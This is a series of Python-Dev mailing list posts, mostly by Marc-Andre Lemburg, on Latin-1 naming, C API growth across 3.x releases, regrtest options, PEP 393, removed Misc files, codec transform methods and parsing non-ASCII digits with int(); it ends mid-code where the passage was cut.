Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:54 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Yet 108 for the correct name, so I can't follow your statement
 that the wrong variant is used more often.
 
 Hmm, your grepping skills are probably better than mine. I get
 
 
 $ grep -iw latin-1 Lib/*.py | wc -l
   24
 
 and
 
 $ grep -iw latin1 Lib/test/*.py | wc -l
   25
 
 (I did get spurious hits with naive grep latin1, so I retract my
 more often claim and just say that both spellings are equally
 common.)

I used a Python script based on re, perhaps that's why :-)

grep only counts lines, not multiple instances on a single line.
Looking through the hits I found, there are a few false
positives such as 'latin-10' or 'iso-latin-1'. Without those,
I get 83 hits.
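
The counting approach described here can be sketched with re, counting
every occurrence on a line (unlike grep) while excluding near-miss
spellings such as 'latin-10' and 'iso-latin-1' (a sketch over sample
input; the actual script used was not posted):

```python
import re

# Match 'latin-1' only when it is not embedded in a longer token such
# as 'latin-10' or 'iso-latin-1'; re.findall counts every occurrence,
# not just every matching line the way grep does.
pattern = re.compile(r"(?<![\w-])latin-1(?![\w-])", re.IGNORECASE)

sample = (
    "s.encode('latin-1'); t.decode('latin-1')  # two hits on one line\n"
    "x.encode('latin-10')                      # false positive for naive grep\n"
    "y.encode('iso-latin-1')                   # another false positive\n"
)
hits = pattern.findall(sample)
print(len(hits))  # counts only the two genuine uses
```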

If you open a ticket for this, I'll add the list of hits to
that ticket.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2

2011-02-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 Latin-1 is the official name and the one used internally by Python,
 
 In what sense is Latin-1 the official name?  The IANA charset
 registry has the following listing
 
 
 Name: ISO_8859-1:1987[RFC1345,KXS2]
 MIBenum: 4
 Source: ECMA registry
 Alias: iso-ir-100
 Alias: ISO_8859-1
 Alias: ISO-8859-1 (preferred MIME name)
 Alias: latin1
 Alias: l1
 Alias: IBM819
 Alias: CP819
 Alias: csISOLatin1
 
 (See http://www.iana.org/assignments/character-sets)

Those are registered character set names, not necessarily
standard names. Anyone can apply for new aliases to get
added to that list.

 Latin-1 spelling does appear in various unicode.org documents, but
 not in machine readable files as far as I can tell.

Latin-1 is short for Latin Alphabet No. 1 and
started out as ECMA-94 in 1985 and 1986:

http://www.ecma-international.org/publications/standards/Ecma-094.htm

ISO then applied their numbering scheme for the character set
standard ISO-8859 in 1987 where Latin-1 became ISO-8859-1.
Note that this was before the Internet took off.

I assume that since the HTML standard used the more popular
name Latin-1 for its definition of the default character set
and also made use of the term throughout the spec, it
became the de-facto standard name for that character set
at the time. I only learned about the term ISO-8859-1
when starting to dive into the Unicode world late in the
1990s.

Latin-1 is also sometimes written as ISO Latin-1, e.g.
http://msdn.microsoft.com/en-us/library/ms537495(v=vs.85).aspx

For much the same reasons, ISO-10646 never really became
popular, but Unicode eventually did.

ECMA-262 or ISO/IEC 16262 just doesn't sound as good as
JavaScript either :-)

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] API bloat

2011-02-10 Thread M.-A. Lemburg
Mark Shannon wrote:
 Nick Coghlan wrote:
 On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk
 wrote:
 Doing a search for the regex:  PyAPI_FUNC\([^)]*\) *Py in .h files,
 which should match API functions (functions starting _Py are
 excluded) gives
 the following result:

 Version  matches
 3.0   717
 3.1.3 728
 3.2b2 743

 It would appear the API  bloat is real,
 not just an artefact of updated docs.

 Since it doesn't account for #ifdef, a naive count like that isn't a
 valid basis for comparison.

 OK. How about this:
 
 egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h
 finds no matches.
 
 egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u
 
 This finds all matches and removes duplicates, so anything defined
 multiple time in branches of #ifdef blocks, will only be counted once.
 
 Version  matches
 3.0   714
 3.1.3 725
 3.2b2 739

Given these numbers, I don't think the subject line really
captures the problem accurately ... a 2% increase
in the number of API functions per release can hardly be called
API bloat :-)
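
The egrep pipeline above can be reproduced in Python, which also makes
the deduplication across #ifdef branches explicit (a sketch over a
made-up header fragment, not the real Include/ tree):

```python
import re

# Hypothetical header fragment: one function declared twice in two
# #ifdef branches, which 'sort -u' collapses to a single entry.
header = """
PyAPI_FUNC(PyObject *) PyFoo_New(void);
#ifdef MS_WINDOWS
PyAPI_FUNC(int) PyBar_Init(void);
#else
PyAPI_FUNC(int) PyBar_Init(void);
#endif
PyAPI_FUNC(void) _PyInternal_Thing(void);  /* private, excluded */
"""

# Same shape as the egrep: capture the name after PyAPI_FUNC(...),
# keeping only public names (those starting 'Py', not '_Py', since the
# capture group requires 'Py' immediately after the return type).
names = set(re.findall(r"PyAPI_FUNC\([^)]*\)\s*(Py\w+)", header))
print(sorted(names), len(names))
```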

 So given, the revised numbers;
 
 The what's new for 3.2 API section:
 http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes
 lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2.

Could you identify the ones that are not yet documented?

That would be useful.

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] API bloat

2011-02-10 Thread M.-A. Lemburg
Mark Shannon wrote:
 M.-A. Lemburg wrote:
 Mark Shannon wrote:
 Nick Coghlan wrote:
 On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk
 wrote:
 Doing a search for the regex:  PyAPI_FUNC\([^)]*\) *Py in .h files,
 which should match API functions (functions starting _Py are
 excluded) gives
 the following result:

 Version  matches
 3.0   717
 3.1.3 728
 3.2b2 743

 It would appear the API  bloat is real,
 not just an artefact of updated docs.
 Since it doesn't account for #ifdef, a naive count like that isn't a
 valid basis for comparison.

 OK. How about this:

 egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h
 finds no matches.

 egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u

 This finds all matches and removes duplicates, so anything defined
 multiple time in branches of #ifdef blocks, will only be counted once.

 Version  matches
 3.0   714
 3.1.3 725
 3.2b2 739

 Given these numbers, I don't think the subject line really
 captures the problem accurately enough ... a 2% increase
 in number of API function per release can hardly be called
 API bloat :-)

 So given, the revised numbers;

 The what's new for 3.2 API section:
 http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes

 lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2.

 Could you identify the ones that are not yet documented ?

 That would be useful.
 
 Here's the details:
 
 The following API functions were removed from 3.1.3:
 
 PyAST_Compile
 PyCObject_AsVoidPtr
 PyCObject_FromVoidPtr
 PyCObject_FromVoidPtrAndDesc
 PyCObject_GetDesc
 PyCObject_Import
 PyCObject_SetVoidPtr
 PyCode_CheckLineNumber
 Py_CompileStringFlags
 PyEval_CallObject
 PyOS_ascii_atof
 PyOS_ascii_formatd
 PyOS_ascii_strtod
 PyThread_exit_prog
 PyThread__PyThread_exit_prog
 PyThread__PyThread_exit_thread
 PyUnicode_SetDefaultEncoding
 
 And the following were added to 3.2,
 of which only 2 are documented:
 
 PyArg_ValidateKeywordArguments
 PyAST_CompileEx
 Py_CompileString
 Py_CompileStringExFlags
 PyErr_NewExceptionWithDoc(documented)
 PyErr_SyntaxLocationEx
 PyErr_WarnFormat
 PyFrame_GetLineNumber
 PyImport_ExecCodeModuleWithPathnames
 PyImport_GetMagicTag
 PyLong_AsLongLongAndOverflow(documented)
 PyModule_GetFilenameObject
 Py_SetPath
 PyStructSequence_GetItem
 PyStructSequence_NewType
 PyStructSequence_SetItem
 PySys_AddWarnOptionUnicode
 PySys_AddXOption
 PySys_FormatStderr
 PySys_FormatStdout
 PySys_GetXOptions
 PyThread_acquire_lock_timed
 PyType_FromSpec
 PyUnicode_AsUnicodeCopy
 PyUnicode_AsWideCharString
 PyUnicode_EncodeFSDefault
 PyUnicode_FSDecoder
 Py_UNICODE_strcat
 Py_UNICODE_strncmp
 Py_UNICODE_strrchr
 PyUnicode_TransformDecimalToASCII
 
 For added confusion PySys_SetArgvEx is documented as
 new in 3.2, but exists in 3.1.3
 
 That should keep someone busy ;)
 
 Note that this only include functions.
 The API also includes a number of macros such as
 Py_False and Py_RETURN_FALSE, types ,
 and data like PyBool_Type.
 
 I've not tried to analyse any of these.

Thanks.

I opened http://bugs.python.org/issue11173 for this.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] API bloat

2011-02-09 Thread M.-A. Lemburg
Mark Shannon wrote:
 The Unicode Exception Objects section is new and seemingly redundant:
 http://docs.python.org/py3k/c-api/exceptions.html#unicode-exception-objects
 Should this be in the public API?

Those functions have been in the public API since we introduced
Unicode callback error handlers.

It was an oversight that these were not documented in the Python
documentation. They have been documented as part of unicodeobject.h
ever since they were introduced.

Note that these APIs are needed by codecs supporting the
callback error handlers, and since performance matters a lot
for codecs, the C APIs were introduced.
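
The callback error-handler mechanism these C APIs back can be
exercised from Python via codecs.register_error(), which is the
pure-Python face of the same protocol (a sketch; the handler name
"demo-question" is made up):

```python
import codecs

# A custom error handler: replace each unencodable character with '?'
# and resume after it. The handler receives the exception, and returns
# a (replacement, resume-position) tuple - the protocol the C-level
# codec machinery invokes on encoding errors.
def replace_with_question(exc):
    if isinstance(exc, UnicodeEncodeError):
        return ("?" * (exc.end - exc.start), exc.end)
    raise exc

codecs.register_error("demo-question", replace_with_question)

print("h\u00e9llo w\u00f6rld".encode("ascii", errors="demo-question"))
# b'h?llo w?rld'
```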

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] Python Unit Tests

2011-02-08 Thread M.-A. Lemburg
Wesley Mesquita wrote:
 Hi all,
 
 I'm starting to explore the Python 3k core development environment. So, sorry in
 advance for any mistakes, but I really don't know what the best list to
 post this is, since it is not a use-of-Python issue, and probably not a dev
 issue; it is more like a dev-env question.
 
 I have run the test suite and got the messages below.
 
 ~/python_dev/python$ make testall
 
 ./python -Wd -E -bb  ./Lib/test/regrtest.py -uall -l
 == CPython 3.2rc2+ (py3k:88376, Feb 7 2011, 18:31:28) [GCC 4.4.5]
 ==   Linux-2.6.35-24-generic-x86_64-with-debian-squeeze-sid little-endian
 ==   /home/wesley/python_dev/python/build/test_python_3387
 Testing with flags: sys.flags(debug=0, division_warning=0, inspect=0,
 interactive=0, optimize=0, dont_write_bytecode=0, no_user_site=0, no_site=0,
 ignore_environment=1, verbose=0, bytes_warning=2, quiet=0)
 
 [...]
 
 [198/349] test_ossaudiodev
 test_ossaudiodev skipped -- [Errno 2] No such file or directory: '/dev/dsp'
 
 [...]
 
 [200/349] test_parser
 Expecting 's_push: parser stack overflow' in next line
 s_push: parser stack overflow
 
 [...]
 
 [321/349] test_urllib2net
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=8, family=2, type=2049, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning:
 unclosed socket.socket object, fd=7, family=2, type=2049, proto=6
   sys.exc_info()[2])
 /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning:
 unclosed socket.socket object, fd=8, family=2, type=2049, proto=6
   sys.exc_info()[2])
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=8, family=2, type=1, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=9, family=2, type=1, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=9, family=2, type=2049, proto=6
   self._sock = None
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=7, family=2, type=2049, proto=6
   self._sock = None
 [323/349] test_urllibnet
 /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed
 socket.socket object, fd=7, family=2, type=1, proto=6
   self._sock = None
 
 
 24 tests skipped:
 test_bz2 test_curses test_dbm_gnu test_dbm_ndbm test_gdb
 test_kqueue test_ossaudiodev test_readline test_smtpnet
 test_socketserver test_sqlite test_ssl test_startfile test_tcl
 test_timeout test_tk test_ttk_guionly test_ttk_textonly
 test_urllib2net test_urllibnet test_winreg test_winsound
 test_xmlrpc_net test_zipfile64
 9 skips unexpected on linux2:
 test_bz2 test_dbm_gnu test_dbm_ndbm test_readline test_ssl
 test_tcl test_tk test_ttk_guionly test_ttk_textonly
 sys:1: ResourceWarning: unclosed file _io.TextIOWrapper name='/dev/null'
 mode='a' encoding='UTF-8'
 
 
 But running each of them individually:
 
 :~/python_dev/python$ ./python Lib/test/regrtest.py  test_ossaudiodev
 [1/1] test_ossaudiodev
 test_ossaudiodev skipped -- Use of the `audio' resource not enabled
 1 test skipped:
 test_ossaudiodev
 Those skips are all expected on linux2.
 
 ./python Lib/test/regrtest.py test_parser
 [1/1] test_parser
 Expecting 's_push: parser stack overflow' in next line
 s_push: parser stack overflow
 1 test OK.
 
 ./python Lib/test/regrtest.py test_urllib2net[1/1] test_urllib2net
 test_urllib2net skipped -- Use of the `network' resource not enabled
 1 test skipped:
 test_urllib2net
 Those skips are all expected on linux2.
 
 Is there any reason for the different results?

Yes: you are not using the same options on the stand-alone
tests as you are on the suite run. Most importantly, you
are not enabling all resources (-uall).

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] PEP 393: Flexible String Representation

2011-01-25 Thread M.-A. Lemburg
I'll comment more on this later this week...

From my first impression, I'm
not too thrilled by the prospect of making the Unicode implementation
more complicated by having three different representations on each
object.

I also don't see how this could save a lot of memory. As an example
take a French text with, say, 10 million code points. This would end up
appearing in memory as 3 copies on Windows: one copy stored as UCS-2 (20MB),
one as Latin-1 (10MB) and one as UTF-8 (probably around 15MB, depending
on how many accents are used). That's a saving of -10MB compared to
today's implementation :-)
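
With PEP 393 as eventually implemented, a string keeps only a single
representation chosen by its widest code point, so the Latin-1 text
above does not pay for three copies at once. Current CPython (3.3+)
can show the per-character width directly (a sketch; exact object
sizes vary by CPython version and platform):

```python
import sys

n = 1000
ascii_text = "a" * n           # 1 byte/char under PEP 393
latin1_text = "\u00e9" * n     # still 1 byte/char (code points < 256)
bmp_text = "\u20ac" * n        # 2 bytes/char (code points < 65536)

# Only one representation is kept per string, so a Latin-1-range text
# does not carry UCS-2 and UTF-8 copies alongside it.
for label, s in [("ascii", ascii_text), ("latin-1", latin1_text), ("bmp", bmp_text)]:
    print(label, sys.getsizeof(s))
```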

Martin v. Löwis wrote:
 I have been thinking about Unicode representation for some time now.
 This was triggered, on the one hand, by discussions with Glyph Lefkowitz
 (who complained that his server app consumes too much memory), and Carl
 Friedrich Bolz (who profiled Python applications to determine that
 Unicode strings are among the top consumers of memory in Python).
 On the other hand, this was triggered by the discussion on supporting
 surrogates in the library better.
 
 I'd like to propose PEP 393, which takes a different approach,
 addressing both problems simultaneously: by getting a flexible
 representation (one that can be either 1, 2, or 4 bytes), we can
 support the full range of Unicode on all systems, but still use
 only one byte per character for strings that are pure ASCII (which
 will be the majority of strings for the majority of users).
 
 You'll find the PEP at
 
 http://www.python.org/dev/peps/pep-0393/
 
 For convenience, I include it below.

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] [Python-checkins] r88127 - in python/branches/py3k/Misc: README.AIX README.OpenBSD cheatsheet

2011-01-20 Thread M.-A. Lemburg
brett.cannon wrote:
 Author: brett.cannon
 Date: Thu Jan 20 20:34:35 2011
 New Revision: 88127
 
 Log:
 Remove some outdated files from Misc.
 
 Removed:
python/branches/py3k/Misc/README.AIX

Are you sure that the AIX README is outdated? It explains some
of the details of why there are scripts like ld_so_aix which are
still needed on AIX.

python/branches/py3k/Misc/README.OpenBSD

Same here. Does OpenBSD 4.x still have the issues mentioned in the
file?

python/branches/py3k/Misc/cheatsheet

Wouldn't it be better to update this useful file (as part of your
PSF grant)? Most of it still applies to Py3.

Regarding some other things you removed or moved:

 DSVN-Python3/Misc/maintainers.rst
 DSVN-Python3/Misc/developers.txt

Why were these removed from the source archive? They are useful
to have around for users wanting to report bugs and are useful
for following the development of the core team between different
Python versions.

 DSVN-Python3/Misc/python-mode.el

Why is this gone? It's a useful file for Emacs users and usually
more recent than what you get with your Emacs installation.

 DSVN-Python3/Misc/AIX-NOTES

I guess this was renamed to README.AIX before you removed it.
See above.

 DSVN-Python3/Misc/PURIFY.README

Why is this outdated?
It should probably be renamed to README.Purify.

 DSVN-Python3/Misc/RFD

That's a piece of Python history. These nuggets should stay
in the Python source archive, IMHO.

 DSVN-Python3/Misc/setuid-prog.c

This is useful for people writing setuid programs in Python and
avoids many of the usual pitfalls:

http://mail.python.org/pipermail/python-list/1999-April/620658.html

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jan 20 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] Tools/unicode

2011-01-03 Thread M.-A. Lemburg
Michael Foord wrote:
 On 03/01/2011 15:39, Alexander Belopolsky wrote:
 On Mon, Jan 3, 2011 at 10:33 AM, Michael
 Foordmich...@voidspace.org.uk  wrote:
 ..
 If someone knows if this tool is still used/useful then please let us
 know
 how the description should best be updated. If there are no replies I'll
 remove it.
 If you are talking about Tools/unicode/, this is definitely a very
 useful tool used to generate unicodedata and encoding modules from raw
 unicode.org files.
 The description currently reads Tools used to generate unicode database
 files. I'll update it to read:
 
 tool used to generate unicodedata and encoding modules from raw
 unicode.org files

Make that "Tools for generating unicodedata and codecs from unicode.org
and other mapping files".

The scripts in that dir are not just one tool, but several tools needed
to maintain the Unicode database in Python as well as generate new
codecs from mapping files.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jan 03 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] The fate of transform() and untransform() methods

2010-12-09 Thread M.-A. Lemburg

Alexander Belopolsky wrote:
 On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossum gu...@python.org wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com 
 wrote:
 ..
 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, but I don't know if that is a
 sufficient argument or not.

 It is not.

 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

 
 I would like to restart the discussion under a separate subject
 because the original thread [1] went off the specific topic of the six
 new methods (2 methods x 3 types) added to builtins shortly before 3.2
 beta was released. [2]  The ticket that introduced the change is
 currently closed [3] even though the last message suggests that at
 least part of the change needs to be reverted.

That's for Guido to decide.

The moratorium, if at all, would only cover the new methods,
not the other changes (re-adding the codecs and fixing the
codecs.py module to work with bytes as well as Unicode), all
of which were already discussed at length in several previous
discussions, on tickets and on python-dev.

I don't see much point in going through the same discussions
over and over again. Fortunately, I'm on vacation next week,
so don't have to go through all this again ;-)

Cheers,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 09 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] The fate of transform() and untransform() methods

2010-12-09 Thread M.-A. Lemburg


Michael Foord wrote:
 On 09/12/2010 15:03, M.-A. Lemburg wrote:
 Alexander Belopolsky wrote:
 On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossumgu...@python.org 
 wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David
 Murrayrdmur...@bitdance.com  wrote:
 ..
 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, but I don't know if that is a
 sufficient argument or not.
 It is not.

 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

 I would like to restart the discussion under a separate subject
 because the original thread [1] went off the specific topic of the six
 new methods (2 methods x 3 types) added to builtins shortly before 3.2
 beta was released. [2]  The ticket that introduced the change is
 currently closed [3] even though the last message suggests that at
 least part of the change needs to be reverted.
 That's for Guido to decide.

 
 Well, Guido *already* said no to transform / untransform in the previous
 thread.

I'm not sure he did and asked for clarification (see attached email).

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 09 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


---BeginMessage---
Guido van Rossum wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote:
 On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky 
 alexander.belopol...@gmail.com wrote:
 On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com 
 wrote:
 ..
 Please also recall that transform/untransform was discussed before
 the release of Python 3.0 and was approved at the time, but it just
 did not get implemented before the 3.0 release.


 Can you provide a link?  My search for transform on python-dev came out with

 It was linked from the issue, if I recall correctly.  I do remember
 reading the thread from the python-3000 list, linked by someone
 somewhere :)

 http://mail.python.org/pipermail/python-dev/2010-June/100564.html

 where you seem to oppose these methods.  Also, new methods to builtins

 It looks to me like I was agreeing that transform/untransform should
 do only bytes->bytes or str->str regardless of what codec name you
 passed them.

 fall under the language moratorium (but can be approved on a
 case-by-case basis):

 http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions

 Is there an effort to document these exceptions?  I expected such
 approvals to be added to PEP 3003, but apparently this was not the
 case.

 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, 

Indeed.

 but I don't know if that is a
 sufficient argument or not.
 
 It is not.
 
 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

Sure, but those two particular methods only provide interfaces
to the codecs sub-system without actually requiring any major
implementation changes.

Furthermore, they help ease adoption of Python 3.x (quoted from
PEP 3003), since the functionality they add back was removed from
Python 3.0 in a way that makes it difficult to port Python2
applications to Python3.

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

How should I read this ? Do you want the methods to be removed again
and added back in 3.3 ?

Frankly, I'm a bit tired of constantly having to argue against
cutting down the Unicode and codec support in Python3.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 06 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/



Re: [Python-Dev] The fate of transform() and untransform() methods

2010-12-09 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Thu, Dec 9, 2010 at 10:03 AM, M.-A. Lemburg m...@egenix.com wrote:
 Alexander Belopolsky wrote:
 ..
  The ticket that introduced the change is
 currently closed [3] even though the last message suggests that at
 least part of the change needs to be reverted.

 That's for Guido to decide.

 The decision will probably rest with the release manager, but Guido
 has clearly voiced his opinion. 

FYI: Georg explicitly asked me whether I would have the patch ready
for 3.2 and since I didn't have time to work on it, he volunteered
to implement it, which I'd like to thank him for !

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 09 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] transform() and untransform() methods, and the codec registry

2010-12-06 Thread M.-A. Lemburg
Guido van Rossum wrote:
 On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote:
 On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky 
 alexander.belopol...@gmail.com wrote:
 On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com 
 wrote:
 ..
 Please also recall that transform/untransform was discussed before
 the release of Python 3.0 and was approved at the time, but it just
 did not get implemented before the 3.0 release.


 Can you provide a link?  My search for transform on python-dev came out with

 It was linked from the issue, if I recall correctly.  I do remember
 reading the thread from the python-3000 list, linked by someone
 somewhere :)

 http://mail.python.org/pipermail/python-dev/2010-June/100564.html

 where you seem to oppose these methods.  Also, new methods to builtins

 It looks to me like I was agreeing that transform/untransform should
 do only bytes->bytes or str->str regardless of what codec name you
 passed them.

 fall under the language moratorium (but can be approved on a
 case-by-case basis):

 http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions

 Is there an effort to document these exceptions?  I expected such
 approvals to be added to PEP 3003, but apparently this was not the
 case.

 I believe MAL's thought was that the addition of these methods had
 been approved pre-moratorium, 

Indeed.

 but I don't know if that is a
 sufficient argument or not.
 
 It is not.
 
 The moratorium is intended to freeze the state of the language as
 implemented, not whatever was discussed and approved but didn't get
 implemented (that'd be a hole big enough to drive a truck through, as
 the saying goes :-).

Sure, but those two particular methods only provide interfaces
to the codecs sub-system without actually requiring any major
implementation changes.

Furthermore, they help ease adoption of Python 3.x (quoted from
PEP 3003), since the functionality they add back was removed from
Python 3.0 in a way that makes it difficult to port Python2
applications to Python3.

 Regardless of what I or others may have said before, I am not
 currently a fan of adding transform() to either str or bytes.

How should I read this ? Do you want the methods to be removed again
and added back in 3.3 ?

Frankly, I'm a bit tired of constantly having to argue against
cutting down the Unicode and codec support in Python3.
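
To illustrate the point about the codecs sub-system: a minimal sketch of
what the codec registry already allows today without any new builtin
methods (assuming Python 3.2+, where the bytes transform codecs were
re-added):

```python
import codecs

# str -> str transform via the codec registry
assert codecs.encode("hello", "rot_13") == "uryyb"

# bytes -> bytes transforms, re-added in Python 3.2
data = b"hello world" * 10
packed = codecs.encode(data, "zlib_codec")
assert codecs.decode(packed, "zlib_codec") == data
```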

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 06 2010)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/




Re: [Python-Dev] Python and the Unicode Character Database

2010-12-03 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Thu, Dec 2, 2010 at 5:58 PM, M.-A. Lemburg m...@egenix.com wrote:
 ..
 I will change my mind on this issue when you present a
 machine-readable file with Arabic-Indic numerals and a program capable
 of reading it and show that this program uses the same number parsing
 algorithm as Python's int() or float().

 Have you had a look at the examples I posted ? They include texts
 and tables with numbers written using east asian arabic numerals.
 
 Yes, but this was all about output.  I am pretty sure TeX was able to
 typeset Qur'an in all its glory long before Unicode was invented.
 Yet, in machine readable form it would be something like {\quran 1}
 (invented directive).   I have asked for a file that is intended for
 machine processing, not for human enjoyment in print or on a display.
  I claim that if such file exists, the program that reads it does not
 use the same rules as Python and converting non-ascii digits would be
 a tiny portion of what that program does.

Well, programs that take input from the keyboards I posted in this
thread will have to deal with the digits. Since Python's input()
accepts keyboard input, you have your use case :-)

Seriously, I find the distinction between input and output forms
of numerals somewhat misguided. Any output can also serve as input.
For books and other printed material, images, etc. you have scanners
and OCR. For screen output you have screen readers. For spreadsheets
and data, you have CSV, TSV, XML, etc. etc. etc.

Just for the fun of it, I created a CSV file with Thai and Dzongkha
numerals (in addition to Arabic ones) using OpenOffice. Here's the
cut and paste version:


Numbers in various scripts  

Arabic  ThaiDzongkha
1   ๑   ༡
2   ๒   ༢
3   ๓   ༣
4   ๔   ༤
5   ๕   ༥
6   ๖   ༦
7   ๗   ༧
8   ๘   ༨
9   ๙   ༩
10  ๑๐  ༡༠
11  ๑๑  ༡༡
12  ๑๒  ༡༢
13  ๑๓  ༡༣
14  ๑๔  ༡༤
15  ๑๕  ༡༥
16  ๑๖  ༡༦
17  ๑๗  ༡༧
18  ๑๘  ༡༨
19  ๑๙  ༡༩
20  ๒๐  ༢༠


And here's the script that goes with it:

import csv
c = csv.reader(open('Numbers-in-various-scripts.csv'))
headers = [c.next() for i in range(3)]
for row in c:
    print [int(unicode(x, 'utf-8')) for x in row]

and the output using Python 2.7:

[1, 1, 1]
[2, 2, 2]
[3, 3, 3]
[4, 4, 4]
[5, 5, 5]
[6, 6, 6]
[7, 7, 7]
[8, 8, 8]
[9, 9, 9]
[10, 10, 10]
[11, 11, 11]
[12, 12, 12]
[13, 13, 13]
[14, 14, 14]
[15, 15, 15]
[16, 16, 16]
[17, 17, 17]
[18, 18, 18]
[19, 19, 19]
[20, 20, 20]

If you need more such files, I can generate as many as you like ;-)
I can send the OOo file as well, if you like to play around with it.
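
For readers on Python 3, the same check works without the explicit
UTF-8 decoding step; a self-contained sketch (the inline data below
stands in for the generated CSV file):

```python
import csv
import io

# Inline stand-in for the CSV file: Arabic, Thai and Dzongkha digits.
data = io.StringIO(
    "Arabic,Thai,Dzongkha\n"
    "1,\u0e51,\u0f21\n"
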